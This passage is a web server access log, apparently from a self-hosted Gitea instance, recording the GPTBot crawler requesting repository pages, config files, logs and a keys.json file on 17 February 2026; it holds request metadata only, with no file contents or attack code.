- GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" -[17/Feb/2026:14:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71823] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" -[17/Feb/2026:14:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10086] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:14:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11660] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:14:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" -[17/Feb/2026:14:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" -[17/Feb/2026:14:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" -[17/Feb/2026:14:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 12774] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" -[17/Feb/2026:14:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151601] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9956] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:14:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9956] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" -[17/Feb/2026:14:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9919] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" -[17/Feb/2026:14:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10964] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" -[17/Feb/2026:14:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" -[17/Feb/2026:14:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9952] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:14:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" -[17/Feb/2026:14:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:14:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:14:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" -[17/Feb/2026:14:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:14:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10975] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" -[17/Feb/2026:14:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:14:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 12775] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" -[17/Feb/2026:14:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" -[17/Feb/2026:14:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:14:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:14:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 16073] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:14:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:14:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets" [Client 74.7.227.38] [Length 24755] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 11530] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" -[17/Feb/2026:14:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11961] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:14:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" [Client 74.7.227.38] [Length 11285] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:14:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14925] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:14:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 11802] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" -[17/Feb/2026:14:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" -[17/Feb/2026:14:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 10142] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" -[17/Feb/2026:14:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" -[17/Feb/2026:14:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23042] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" -[17/Feb/2026:14:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr 